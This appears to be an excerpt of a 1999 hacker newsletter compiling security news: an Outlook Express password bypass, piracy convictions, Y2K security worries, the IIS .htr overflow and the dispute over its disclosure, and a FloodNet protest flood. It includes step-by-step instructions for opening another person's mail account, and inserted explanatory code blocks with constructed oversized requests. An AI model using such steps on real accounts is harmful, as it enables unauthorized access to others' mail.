"I selected my step father's account, typed in his password, and got a message
saying that his password was incorrect," Jung says. "I try again and again. No go.
Then for the heck of it I looked up my password for my account, tried it, and got
it. I did the procedure again over and over, and I can reproduce it every time.
Whatever account I click and then cancel, that is the password for all the
accounts."
The situation can be reproduced this way:
- Open Outlook Express and at the user account dialog select "New User."
In the settings type in any password you want.
- Select change user from File.
- Select the newly created account, then click "OK."
- Click cancel at the password prompt.
- Select the user's account you would like to break into, and click "OK."
- Type in YOUR password for the new account and you're in.
DON'T try this at work or to access anyone's email account without permission.
This was for "demonstration purposes" only.
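As an added model of the reproduction steps above, and not Microsoft's code: the article does not say why the password check fails, so the mechanism assumed here is that a cancelled password prompt leaves its target account bound, and the next prompt then checks the typed password against that stale account rather than the one just selected. The account names and passwords are constructed. The model runs in both the defective and the fixed mode so the two behaviours can be compared.

```c
/* Added example, not Microsoft's code. A small model of the account
 * switch the article describes, showing the bug class (prompt state
 * that survives a cancelled dialog) and its fix. The mechanism is an
 * assumption; names and passwords are constructed. */
#include <string.h>

#define MAX_ACCOUNTS 4

struct account { const char *name; const char *password; };

struct switcher {
    struct account acct[MAX_ACCOUNTS];
    int n;
    int selected;     /* account the password dialog shows, -1 = none  */
    int prompt_for;   /* account whose password is checked, -1 = none  */
    int current;      /* account currently opened, -1 = none           */
    int stale_cancel; /* 1 = reproduce the defect, 0 = fixed behaviour */
};

void switcher_init(struct switcher *s, int stale_cancel) {
    memset(s, 0, sizeof *s);
    s->selected = s->prompt_for = s->current = -1;
    s->stale_cancel = stale_cancel;
}

int switcher_add(struct switcher *s, const char *name, const char *pw) {
    if (s->n >= MAX_ACCOUNTS)
        return -1;
    s->acct[s->n].name = name;
    s->acct[s->n].password = pw;
    return s->n++;
}

/* "Change Current User": pick an account and open the password prompt.
 * Defective model: the prompt target is bound only when none is pending,
 * so a target left over from a cancelled prompt sticks to every later
 * selection. Fixed model: the target always follows the selection. */
int switcher_select(struct switcher *s, int idx) {
    if (idx < 0 || idx >= s->n)
        return -1;
    s->selected = idx;
    if (s->stale_cancel) {
        if (s->prompt_for < 0)
            s->prompt_for = idx;
    } else {
        s->prompt_for = idx;
    }
    return 0;
}

/* "Cancel" on the password prompt. The fix also clears the target. */
void switcher_cancel(struct switcher *s) {
    s->selected = -1;
    if (!s->stale_cancel)
        s->prompt_for = -1;
}

/* Type a password. 0 = opened the selected account, 1 = wrong password,
 * -1 = no prompt open. */
int switcher_enter_password(struct switcher *s, const char *pw) {
    if (s->selected < 0 || s->prompt_for < 0)
        return -1;
    if (strcmp(pw, s->acct[s->prompt_for].password) != 0)
        return 1;
    s->current = s->selected;
    s->selected = s->prompt_for = -1;
    return 0;
}

/* The article's sequence: select account A, cancel, select account B,
 * then type 'typed'. Returns 1 if B was opened, 0 if not. */
int run_model(int stale_cancel, const char *typed) {
    struct switcher s;
    int a, b;
    switcher_init(&s, stale_cancel);
    a = switcher_add(&s, "student", "maple-tree-42");     /* constructed */
    b = switcher_add(&s, "stepfather", "harbor-lamp-7");  /* constructed */
    switcher_select(&s, a);
    switcher_cancel(&s);
    switcher_select(&s, b);
    if (switcher_enter_password(&s, typed) == 0 && s.current == b)
        return 1;
    return 0;
}
```

In the defective mode, B's own password is rejected and A's password opens B, which is exactly the pair of observations in the article; in the fixed mode only B's password opens B. The general lesson is that any authentication prompt must re-derive whose credential it is checking from the current selection, never from state left behind by an earlier, abandoned prompt.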
MacCentral contacted the Microsoft Macintosh Business Unit at Microsoft, and
Product Manager Irving Kwong confirmed the problem. He says Outlook Express
doesn't encrypt mail data stored in the application - but that the problem isn't
unique to Microsoft's free email application.
"Encryption functionality of mail data does not exist in any free Macintosh email
application, as this level of security is best executed at the operating system level,"
Kwong says. "Outlook Express' password protection between multiple users on
the same computer is not secure. The password merely acts as a padlock on
users' personal preferences."
So what is a secure solution? Kwong says it's coming with the next ramp of the
Mac OS, codenamed Sonata.
"You may remember Sonata's new multiple user environment being demonstrated
at the WWDC," Kwong says (check out our story at
http://www.maccentral.com/news/9905/10.sherlock.shtml). "We have been
working on support for Sonata's multi-user functionality for Outlook Express and
demonstrated this technology at the WWDC. This is the first offering of
system-level security for multiple users sharing a Macintosh and is the best solution
for true support, as it ensures password and data security. For Outlook Express
customers and Macintosh users looking for a password secure solution for multiple
users sharing a computer, we suggest using the upcoming version of Outlook
Express with Sonata. The combination of Outlook Express and Sonata is a secure
solution for Macintosh users doing email from the same computer."
Sonata is due in the second half of the year.
@HWA
46.0 Major Pirates Convicted
~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
Texan Convicted of Pirating $63mil, in Germany.
A German State court has sentenced a Texas man to
four years in prison for three counts of counterfeiting
Microsoft programs. Microsoft said that this case was
the "biggest in terms of the operation's sophistication
and the magnitude of damage."
Nando Times
http://www.techserver.com/story/body/0,1634,60053-95659-682086-0,00.html
Wired
http://www.wired.com/news/news/politics/story/20239.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2276234,00.html
Father and Son, Busted.
Father and son were convicted in Massachusetts of
conspiring to sell $20 million in stolen Microsoft
Software. The father was fined over $1 Million and
sentenced to almost six years in jail, the son was fined
$100,000 and got ten months in jail.
Nando Times
http://www.techserver.com/story/body/0,1634,60069-95685-682199-0,00.html
Nando Times;
Texan convicted of software piracy in Germany
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
AACHEN, Germany (June 15, 1999 3:33 p.m. EDT http://www.nandotimes.com) - A German state court convicted John-Joseph Staud, a
Texas man, on Tuesday of counterfeiting more than $63 million worth of Microsoft computer programs.
Staud, 39, was sentenced to four years in prison for three counts of counterfeiting patented programs and smuggling them into
Germany for commercial purposes.
Microsoft Corp. greeted the court's decision as "a meaningful signal" toward thwarting computer piracy. The software giant, based in
Washington state, said the counterfeit case was its biggest in terms of the operation's sophistication and the magnitude of damage.
The court denied Microsoft's request for damages, saying that should be handled by a court in England, where Staud allegedly ran a counterfeit
compact disc production plant and printing operation. He also faces charges in England.
Charges against Staud stemmed from a German customs office investigation last August that uncovered 300,000 counterfeited CD-ROMs with
programs such as MS Office, Windows 95, and Windows NT, along with 400,000 installation handbooks.
The materials, which had been smuggled into Germany, were found in a rented container and a warehouse in the town of Kreuzau, about 20
miles east of Aachen, which is located on the border with Belgium.
-=-
Wired;
Germany Jails Software Pirate
Reuters
4:30 p.m. 15.Jun.99.PDT
A German court sentenced an American
man to four years in prison without
probation Tuesday for importing illegally
copied Microsoft computer software.
It was the first time Germany has issued
a prison sentence in a crime involving
software piracy, Microsoft (MSFT) said.
"The 39-year-old Texan was sentenced
today for four years without probation," a
spokesman for the German regional court
of Aachen said.
The sentencing of the man, identified
only as John S., follows the seizure by
German customs officials of thousands of
illegal copies of Microsoft software
programs and manuals last August.
Microsoft said fraud was proved in several
instances in the case, with total damages
amounting to about 120 million marks
(US$64 million).
"This sentence is a breakthrough in
Germany and shows that counterfeiting
software is really a serious crime," Rudolf
Gallist, general manager of Microsoft
GmbH, said in a statement.
- - -
More MS Software Pirates Jailed: Three
more defendants in the "Crazy Bob's"
stolen software ring were sentenced this
week, federal prosecutors said Thursday.
The three are the latest to be sentenced
for their part in a conspiracy to sell
US$20 million in Microsoft Corp. software
stolen from a Massachusetts disc
manufacturer.
Marc Rosengard, an employee of Crazy
Bob's discount computer shop in
Wakefield, Mass., was sentenced on
Thursday to 33 months in prison and
three years supervised release, and must
pay $20,000 in restitution to Microsoft,
prosecutors said. Another defendant,
Maxine Simons, 59, was sentenced on
Wednesday by US District Court Judge
George O'Toole to two years and nine
months in prison and ordered to pay
restitution of $908,000, prosecutors said.
Her husband Robert Simons, who ran
Crazy Bob's, was given a 70-month prison
sentence on Tuesday. Their son, William
Simons, was sentenced to one year and
10 months on Tuesday. Also sentenced
on Wednesday was Gerald Coviello, 62, to
two years and six months in prison.
Maxine Simons and Coviello were
convicted of conspiracy to transport
stolen property following a three-week
jury trial in March. Among other misdeeds,
Crazy Bob's was accused of buying and
reselling 32,000 stolen copies of Microsoft
Office 97 Professional Edition. Worth $599
apiece, they were acquired from rogue
former employees of KAO Infosystems of
Plymouth, Massachusetts, which
manufactured the discs.
Copyright © 1999 Reuters Limited.
-=-
Nando Times #2
Sellers of $20 million of stolen software sentenced to prison
Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service
BOSTON (June 15, 1999 4:04 p.m. EDT http://www.nandotimes.com) - A father and son pair accused of conspiring to sell more than $20
million in Microsoft Corp. software stolen from a Massachusetts manufacturer were sentenced to prison, prosecutors said
Tuesday.
Robert Simons, 62, who ran Crazy Bob's discount software store in Wakefield, Massachusetts, was sentenced to five years and 10 months
imprisonment by U.S. District Judge George O'Toole Monday. Simons was also ordered to pay $908,000 in restitution to Microsoft and to forfeit
$440,000 to the federal government.
His son, William Simons, 35, a Crazy Bob's salesman, was sentenced to one year and 10 months in prison, and must pay $100,000 to
Microsoft, prosecutors said.
Crazy Bob's was accused of buying millions of dollars worth of computer discs stolen from KAO Infosystems, a disc manufacturer in Plymouth,
Massachusetts, by two ex-KAO workers.
The two former KAO employees pleaded guilty to related charges and were awaiting sentencing, prosecutors said.
Among other misdeeds, the Simons were accused of buying 32,000 stolen copies of Microsoft Office 97 Professional Edition, worth $599
apiece, and reselling them to CD-ROM outlets in California and Great Britain, prosecutors said.
@HWA
47.0 Fear of Y2K Raises Security Concerns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by roach
Australia Concerned Over Y2K and Security
Fears that the Y2K bug will create weaknesses in
computer security are being raised. Some companies are
spending money on Y2K issues and are ignoring
important security issues. The fear is that cyber attacks
may be misinterpreted as run-of-the-mill Y2K problems.
Australia News
http://technology.news.com.au/techno/4297150.htm
Australian Financial Review
http://www.afr.com.au/content/990615/update/update38.html
DOD Plans for Possible Y2K Attack
The US DOD has started evaluating possible scenarios
for cyber attacks that may be masquerading as Y2K
computer glitches. While not saying how likely such
an attack may be, DOD said it is just being prepared for
any contingency.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-cybery2k-6-15-99.html
Australian News;
Bug scare aids cyber terror
By STEFANIE BALOGH
16jun99
The Y2K bug has left computer systems around the world vulnerable to
cyber terrorist attacks when the new millennium dawns, an international
computing expert warned yesterday.
Constance Fortune, vice-president of Canada's Science Applications
International Corporation, said because companies had focused
resources on Y2K compliance, they had left their operations open to
other security risks.
Speaking at the 11th FIRST (Forum for Incident Response Security
Team) computer security conference in Brisbane, Ms Fortune said
amateur hackers and cyber criminals were poised to wreak havoc on
New Year's Day and beyond. She predicted the problems could be more
disastrous than any virus because multinational and government
computer systems would be at their weakest.
"Those who create viruses, worms and other destructive computer
phenomena have found ways to take advantage of the Y2K problem,"
she warned.
Ms Fortune said it was crucial for computer emergency response teams
to be able to determine whether system failure was the result of Y2K
problems or camouflaged security attacks.
Ms Fortune also said northern hemisphere firms would closely watch as
Australia embraced the millennium, hours before the US, Europe and
Britain.
"What happens in Australia as 2000 rolls in will provide us with a
much-appreciated early warning of what we can expect only hours
later," she said.
Her warnings were echoed by information technology security expert Bill
Caelli, who predicted the security problems caused by companies
focusing on Y2K compliance could continue for 12-18 months.
Professor Caelli, from the Queensland University of Technology, also
said business and government had "lost 20 years" of work on computer
security because they were more interested in cost-cutting.
He also called for the Australian Government to introduce tougher
legislation to force companies to upgrade information security and for
the Government to end the practice of outsourcing its IT capabilities.
-=-
Federal Computer Week;
JUNE 15, 1999 . . . 16:33 EDT
DOD preps for possible cyberattacks brought on
by Y2K
BY BOB BREWIN (antenna@fcw.com)
The Pentagon has started to develop plans that would shut back doors that
hook its global networks to the Internet in case cyberfoes try to use any Year
2000 computer date code snafus to mount a cyberattack.
Marvin Langston, deputy assistant secretary of Defense for command, control
communications and intelligence, declined to estimate the possibility of such a
cyberassault. He said the Pentagon has started to develop contingency plans
to protect its networks at the end of the year in case "cyberattackers try to
mask themselves in the confusion."
"We want to be able to close down our back doors," said Langston, speaking
at GovTechNet, a Washington, D.C., conference sponsored by FCW and the
Armed Forces Communications and Electronics Association.
Langston said hacker Web sites and discussion groups have mentioned seizing
the opportunity to launch cyberattacks against DOD by using any computer or
network that may be malfunctioning because of Year 2000 problems.
DOD "has to be prepared to deal with it," Langston said.
-=-
@HWA
48.0 Israeli Banks Thwart Attempted Cyber Break-In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by LirA
Buried down in the fifth paragraph is a statement by
Bank of Israel Supervisor of Banks Dr. Yitzhak Tal, who
claims that the Israeli banking system has been the
target of "primitive and insignificant" cyber attacks.
Israel's Business Arena
http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.20/19990614/1
Tuesday, Jun 15, 1999
Tal: Hackers Tried to Break Into
Internet Banking Services
By Zeev Klein
Bank of Israel Supervisor of Banks Dr. Yitzhak
Tal is opposed to mergers between large banks,
because the Israeli banking system is still too
centralist. Briefing economic correspondents
yesterday upon the publication of the annual
banking system report for 1998, Tal said, "It’s
impossible to draw comparisons between Israel
and the US or Europe. There, too, it’s still not
clear what’s the cause for bank mergers. We’re
different from them, and we must be more
careful."
According to Tal, mergers between small banks
are not really beneficial. "I’m in favor of mergers
between small banks, and against mergers
between big banks. But a small bank plus a
small bank gives yet another small bank," Tal
said.
As for mergers between medium-size banks, Tal
said that the issue is under examination by the
Bank of Israel. He stressed, however, that "at
the moment we’re not faced with any specific
request on which we must take a decision. We
are rather seeking to work out our position in
principle on the issue. There are arguments both
ways. On the one hand, mergers between
medium-size banks will increase the centralism
of the system, which is very considerable as it
is. On the other hand, it may well be that a new
banking player that would compete with the
large banks will enhance competitiveness. Our
key consideration is improving competition,
rather than stability," Tal said.
Referring to the expansion of Internet banking
services, Tal said, "We don’t have to be the trail
blazers on Internet worldwide. We must be
cautious, and see how this area develops
throughout the world."
Tal disclosed that hackers had recently
attempted to break into the Internet banking
system, but added that the efforts were primitive
and insignificant, and did not result in any real
damage to customers or to the banks.
Tal did not expect any Y2K-related massive
malfunction that might wipe out public deposits.
According to him, "Public deposits aren’t going
to be virtually wiped out." Tal added that the
banks are taking the proper measures to cope
with Y2K.
Published by Israel's Business Arena June 14,
1999
@HWA
49.0 Navy Wants Tighter Network Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Lif3r
The US Navy is looking into adding real-time intrusion
detection capabilities into its network defenses.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-navy-6-15-99.html
JUNE 15, 1999 . . . 12:55 EDT
Navy looks to upgrade network security
BY DIANE FRANK (diane_frank@fcw.com)
As part of its overall security strategy, the Navy is looking at several new
auditing products that can offer real-time intrusion detection.
The Navy is using the auditing and other security features that are part of
Microsoft Corp.'s Windows NT and variations of the Unix operating system.
But the Navy can only use that technology to find out about intrusions into a
network after the fact, Cmdr. Larry Downs, director of operations for the
Navy Fleet Information Warfare Center, said today at the GovTechNet
conference in Washington, D.C.
Companies recently have released several products that will enable Navy
network administrators to learn about intrusions and attacks as the attacks
occur. The Navy is interested in incorporating the products into its network
security, Downs said.
"The Navy is looking closely at this and will probably look to buy in the very
near future," he said.
@HWA
50.0 IIS Hole Continues to Make News/Fix Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Marc
The major hole publicly announced yesterday by the eEye
Digital Security Team in Microsoft's Internet Information
Server is continuing to make news.
Internet News
http://www.internetnews.com/prod-news/article/0,1087,9_139231,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2277295,00.html
eEye Releases Fix
Microsoft has issued a workaround for this bug; however,
it breaks functionality such as /iisadmpwd/. The eEye
Digital Security Team has released their own fix that
resolves the problem and preserves functionality. It
limits .htr requests to 200 characters, and logs the IP
address of the person trying the overflow. This is a
great deal better than the current recommendation from
Microsoft, which is to just remove the .htr ISAPI filter.
eEye Digital Security Team
http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp
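As an added illustration of the mitigation described above, and not eEye's or Microsoft's own code, the guard below rejects .htr requests whose target is longer than 200 characters and logs the client address, while letting short .htr requests and long non-.htr requests through. The sample request lines, the 192.0.2.x addresses and the choice to measure the URL target (path plus query string) are constructed assumptions for the demonstration.

```python
"""Request-length guard for .htr requests, modelled on the fix described in
the item above: deny .htr requests over 200 characters and log the client
address. Added example, not eEye's or Microsoft's code."""
import logging
from urllib.parse import urlsplit

HTR_MAX_LEN = 200  # limit quoted in the item above

logger = logging.getLogger("htr_guard")


def parse_request_line(line: str):
    """Split 'METHOD target HTTP/x.y' into its three parts; raise on malformed input."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line")
    return parts[0], parts[1], parts[2]


def is_htr_request(target: str) -> bool:
    """True when the request path (query string ignored) ends in .htr, case-insensitively."""
    path = urlsplit(target).path
    return path.lower().endswith(".htr")


def check_request(line: str, client_ip: str):
    """Return (allowed, reason) for one request line from one client.

    Over-length .htr requests are denied and the client address is logged,
    mirroring the behaviour the item attributes to the eEye fix. Length is
    measured over the whole target (assumption), so a long query string
    appended to a short .htr path is still caught."""
    try:
        method, target, version = parse_request_line(line)
    except ValueError:
        logger.warning("malformed request line from %s", client_ip)
        return False, "malformed"
    if is_htr_request(target) and len(target) > HTR_MAX_LEN:
        logger.warning("oversized .htr request (%d chars) from %s",
                       len(target), client_ip)
        return False, "htr-too-long"
    return True, "ok"


# Constructed sample traffic (addresses from the RFC 5737 documentation range).
SAMPLE_REQUESTS = [
    ("GET /iisadmpwd/example.htr HTTP/1.0", "192.0.2.10"),            # short .htr: allowed
    ("GET /scripts/" + "A" * 300 + ".htr HTTP/1.0", "192.0.2.11"),     # oversized .htr: denied
    ("GET /page.HTR?q=" + "B" * 300 + " HTTP/1.0", "192.0.2.12"),      # long query on .htr: denied
    ("GET /" + "C" * 300 + ".html HTTP/1.0", "192.0.2.13"),            # oversized, not .htr: allowed
    ("garbage", "192.0.2.14"),                                         # malformed: denied
]


def run_samples():
    """Apply the guard to every constructed sample and return the reasons."""
    return [check_request(line, ip)[1] for line, ip in SAMPLE_REQUESTS]


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    for (line, ip), reason in zip(SAMPLE_REQUESTS, run_samples()):
        print(f"{ip}: {reason}")
```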
CERT Advisory Released
A day late and a dollar short, CERT (Computer
Emergency Response Team) has released an advisory
concerning this major problem. Unfortunately they forgot
to credit who found the problem.
CERT
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
Irresponsible Security Companies
This article on C|Net questions whether eEye did the
right thing by releasing their advisory before Microsoft
was ready with their patch. A quote in the article from a
Microsoft representative called this "contrary to all of
the normal rules of responsible security professionals."
[rant on] Bullshit. The company that has shown the
public how irresponsible they are is Microsoft. Microsoft
knew about this problem for a week but did nothing until
it was released to the public. It is extremely likely that
someone else found this hole and did not tell anyone.
They could have used this problem to install back doors
on most of the servers in the world without anyone
knowing. Microsoft could have stopped this action a
week earlier and didn't. Microsoft is the one who is not
acting like a 'responsible security professional'.[/rant
off]
C|Net
http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni
C|Net;
Microsoft server bug wrongly publicized?
By Stephanie Miles, Stephen Shankland, and Wylie Wong
Staff, CNET News.com
June 16, 1999, 6:50 p.m. PT
Microsoft offered a temporary fix for a problem with its Web server software that lets attackers "inject" a program that
can run on a Windows NT-based system.
In the meantime, the manner in which the bug was reported and publicized is generating controversy.
The bug attacks Internet Information Server, Microsoft's software for serving up Web pages. Putting the right type of malicious
code into a page request can cause IIS to crash, or worse, let an attacker run whatever
programming code he wants.
Firas Bushnaq, CEO of Eeye, today accused Microsoft of dragging its feet to solving the problem.
His company alerted Microsoft on June 8, he said, but Microsoft told him to keep quiet about it.
Bushnaq said he went public yesterday because he felt Microsoft wasn't doing anything to resolve
the issue.
But Bushnaq didn't stop at just publicizing the bug, and that's where the controversy comes in:
EEye posted a program that will exploit the weakness, a move Microsoft says runs contrary to
established procedures for reporting and patching bugs.
Not surprisingly, Microsoft disputes Bushnaq's version of the story.
"You can send a 'malformed' or very long request to a Web server. It could cause a buffer overflow,
which means you can embed application code that will execute on the server," Bushnaq explained
of the bug.
"Anything that is residing on the Web server and everything connected to that--back-end databases, e-commerce information,
credit card information--could be accessible," he continued. "It is extremely important for people to fix it."
"We've got a security response process that we set up a year ago so that customers would have a place to report bugs and so
that we could respond to it quickly," countered Scott Culp, a security product manager for Microsoft. No confirmed problems
occurring as a result of the bug have been reported, he said.
"For reasons we don't understand, at the beginning of this week they [Eeye] suddenly went public with the bug. It's contrary to all
of the normal rules of responsible security professionals," he said. "You don't provide tools that malicious users can use to hurt
innocent people."
Microsoft rushed to post a workaround to the problem, but a true fix to patch the bug is not yet available. The workaround will
protect users from malicious or arbitrary code, Culp said.
"We're completing the patch right now, but we need to make sure that we've fully tested it. In the meantime, nobody needs to be
vulnerable because of the workaround," he said.
@HWA
51.0 World Braces for International Day of Action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by barbie
Officials in Australia and around the world are bracing
for International Day of Action on June 18th known as
J18. June 18 is also the same day as the G8 meeting in
Cologne, Germany. J18 organizers are calling for
disruption of financial centers, banking districts and
multinational corporate power bases. Examples of
possible activities include picketing, street parties,
leafleting, rallies, marches, strikes, carnivals, and of
course 'hacking'.
Australian Financial Review
http://www.afr.com.au/content/990616/update/update37.html
Australian Financial Review - Yes, there are two stories
J18 hackers 'could target Australia'
on Friday
Australian companies could be targeted by computer
hackers this Friday as part of an international day of
action against big business, a computer security
conference was told today.
But for those companies without adequate computer
security, it may be too late to bolster defences, Byron
Collie, from Australian Federal Police's national
computer crime team said.
Mr Collie told the conference the international day of
action on Friday, known as J18, could include
cyberattacks on business and banking computer
networks.
The J18 action coincides with the G8 meeting in
Cologne, Germany.
The official J18 site on the Internet calls for people to
plan individual "actions" focusing on disrupting "financial
centres, banking districts and multinational corporate
power bases".
"It is up to the groups themselves to decide what to do
on the day," it says.
"Examples could include picketing, street parties,
leafleting, rallies, marches, strikes, carnivals, hacking,
blockades, whatever."
Mr Collie said there was a growing trend for computer
hacking to be politically motivated and for a number of
hackers to work in cooperation.
"Motivation for these (hacking) activities have changed
slightly from the usual teenage intruder-type activity," he
told the Computer Security Incident Handling and
Response conference.
"There's a lot more political and issue motivated
activities."
Mr Collie said one example of "hacktivism" occurred
during the Kosovo conflict when a Serbian computer
expert distributed an e-mail calling for all Serbs
throughout the world to launch a concentrated
cyberattack on the computer systems of NATO
countries.
Late last year, as Indonesia was preparing for its
elections, hackers shut down an East Timorese website
based in Ireland, he said.
"I would hope that you have every measure already in
place," he told the conference delegates.
AAP
@HWA
52.0 ECD Targets Mexican Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by stealth
The people at Electronic Civil Disobedience are planning
a virtual 'sit-in' in protest of the treatment of the
Zapatistas by the Mexican government. The sit-in will
basically be a DoS attack against several Mexican
government internet sites. This demonstration is
planned to take place on June 18 from 10:00am to
4:00pm Mexico City time.
Electronic Civil Disobedience
http://www.thing.net/~rdom/ecd/ecd.html
The June 18th Sit-in report from ECD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
JUNE 18: THE VIRTUAL AND THE REAL
ACTION ON THE INTERNET AND IN AUSTIN, TEXAS
ZAPATISTA FLOODNET AND RECLAIM THE STREETS
by Stefan Wray, June 19, 1999, 6:00 CDT
"The resistance will be as transnational as capital."
On June 18, 1999, simultaneous with the G8 meeting in Koln, Germany, people all over the world
participated in actions and events under the banner "Reclaim The Streets." Email reports coming in today
indicate that 10,000 people gathered in Nigeria and that San Francisco drew crowds of around 500. More
news and reports of events will surely be posted in the coming days. What follows is a contribution to this
emerging body of material.
Reclaim the Streets European Headquarters http://www.gn.apc.org/rts/ Below are two separate and very
different reports. The first describes the results of the virtual sit-in called by the Electronic Disturbance
Theater opposing the Mexican government that involved thousands of people from 46 countries. The
second is a longer narrative account describing events as they unfolded in Austin, Texas, an action that
involved about 50 people and resulted in three arrests. It ends with some comments on hybridity, meshing
the virtual and the real.
THE VIRTUAL
On June 15, the Electronic Disturbance Theater began sending out email announcements urging people
to join in an act of Electronic Civil Disobedience to stop the war in Mexico. The call made in conjunction
with the Reclaim The Streets day of action was intended to introduce a virtual component to the
numerous off-line actions happening all over the world. But a strong motivation for the action was also
due to the fact that in recent weeks there has been a significantly higher level of government and military
harassment of Zapatista communities in Chiapas, with reports indicating as many as 5,000 Zapatistas
have fled their communities.
The suggested action was for people using computers to point their Internet browser to a specific URL
during the hours of 4:00 and 10:00 p.m. GMT. By directing Internet browsers toward the Zapatista
FloodNet URL, during this time period, people joined a virtual sit-in. What this meant was that their
individual computer began sending re-load commands over and over again for the duration of the time
they were connected to FloodNet. In a similar way that people were out in the streets, clogging up the
streets, the repeated re-load command of the individual user - multiplied by the thousands engaged -
clogged the Internet pathways leading to the targeted web site. In this case on June 18, FloodNet was
directing these multiple re-load browser commands to the Mexican Embassy in the UK.
(http://www.demon.co.uk/mexuk)
The results of the June 18 Electronic Disturbance Theater virtual sit-in were that the Zapatista FloodNet
URL received a total of 18,615 unique requests from people's computers in 46 different countries. Of that
total, 5,373 hits on the FloodNet URL - 28.8 percent - came from people using commercial servers in the
United States - the .com addresses. People using computers in the United Kingdom accounted for the
second largest number of participants, 3,633 or 19.5 percent. People with university accounts in the U.S.,
1,677 of them, made up the third largest category of participants at 9.0 percent. Interestingly, the fourth
largest category of participants came from .mil addresses, from the U.S. military, for which there were
1,377 hits on the FloodNet URL, at 7.4 percent. Included among the military visitors were people using
computers at DISA, the Defense Information Systems Agency. [In the same way that police help to block
the streets when they show up at a demonstration, the military and government computer visitors to the
FloodNet URL inadvertently join the action.] And the fifth largest group of participants were from
Switzerland with 1,276 or 6.8 percent.
The remaining 5,329, or 28.6 percent, of global participants in the June 18 virtual sit-in came from all
continents including 21 countries in Europe (Austria, Belgium, Czech Republic, Denmark, Estonia,
Finland, France, Germany, Greece, Hungary, Ireland, Italy, Lithuania, Macedonia, Netherlands, Norway,
Poland, Portugal, Spain, Sweden and Yugoslavia), 7 countries in Latin America (Argentina, Brazil, Chile,
Colombia, Mexico, Peru and Uruguay), 6 countries in Asia (Indonesia, Japan, Malaysia, Singapore, South
Korea and Taiwan), 5 in the Middle East (Bahrain, Israel, Qatar, Saudi Arabia and Turkey), Australia and
New Zealand, Canada, Georgia (former Soviet Union), and South Africa.
The global Zapatista FloodNet action on June 18 is the first that the Electronic Disturbance Theater
called for in 1999. The group began in the spring of 1998 and launched a series of FloodNet actions
directed primarily against web sites of the Mexican government, but action targets also included the White
House, the Frankfurt Stock Exchange, the Pentagon. The highlight was in September when the group
showcased FloodNet at the Ars Electronica festival on Information Warfare in Linz, Austria. At that time
one of the targets of FloodNet was a U.S. Department of Defense web site. This action is noteworthy
because of a Pentagon countermeasure, since it may be one of the first known instances in which the DOD
has engaged in an offensive act of information warfare against a domestic U.S. target - an act some say
could have been illegal.
More details on the Electronic Disturbance Theater can be found at:
http://www.thing.net/~rdom/ecd/ecd.html
THE BEGINNING OF THE REAL
I turned off my computer, moved away from the screen, and left work at 5:00. My girlfriend picked me up
in the car and we passed by the bank so I could cash my paycheck. Good thing too. My balance had
literally been 99 cents. Then we drove to the radio station, KOOP, where we do a half-hour news
program every Friday.
It was hot inside the station, as it was outside. But the studio was nice and cool, so we sat there and
waited for the Working Stiff show to end and the news to begin. We listened to John do a phone interview
with someone from the pipe-fitters union. They were talking about a strike.
We started off the news with a long piece from A-Infos about the World Trade Organization. It was a
decent article but a bit too long to read on the air. The piece ended with a call for people to travel to
Seattle later in the year to oppose the third WTO ministerial conference.
After the news we walked over to join a handful of IWW folks who put out the Working Stiff Journal. They
were at Lovejoys, a bar with a decent selection of beer just off 6th Street.
I started talking to a few friends about the war in Yugoslavia and an idea I'd had that it might be good to form
a focus group on the history, present, and future of war. The idea being that the left doesn't really
understand war anymore, or rather, that the left is using the same techniques to oppose war that it used
30 years ago, but that the way wars are fought has changed. The few who I talked to supported the idea
and had some good suggestions.
RUTA MAYA
After swilling down a few pints, at around 7:30, my girlfriend and I left Lovejoys and drove over to Ruta
Maya. All I knew was that the Critical Mass bike ride was to end up there. And the ride was Austin's effort
to be part of the global Reclaim The Street actions that were happening all over the world.
Ruta Maya is a coffee shop in downtown Austin's warehouse district. They import coffee from Chiapas.
Local activist groups often stage benefits and events there.
When we got to Ruta Maya people from the bike ride were already filtering in. They had started the ride
up by the university. I wasn't on the ride so I only heard snapshots of what had happened. But I learned
that a few had spent the previous night working on some stickers that said, "Closed" and "Out of Order."
These were to put on ATM machines and other relevant symbols of capital. The ride passed by the Gap.
For a moment Gap workers were harassed for selling clothes manufactured in sweatshops.
The crowd inside and outside on the elevated sidewalk was a mix of Ruta Maya regulars, people who
came to hear an acoustic guitarist playing inside, customers of Ruta Maya's cigar shop, anyone who
happened to be walking by, and of course the cyclists from the Critical Mass/RTS ride.
First I talked to some people involved in Free Radio Austin, a local micropower radio station shut down by
the FCC a few weeks ago - which is incidentally scheduled to go back on the air today. We didn't talk
about that, but about some of the problems with a new space here called Pueblos Unidos. A long story,
but basically there is a power struggle among the original tenants of this allegedly collective warehouse
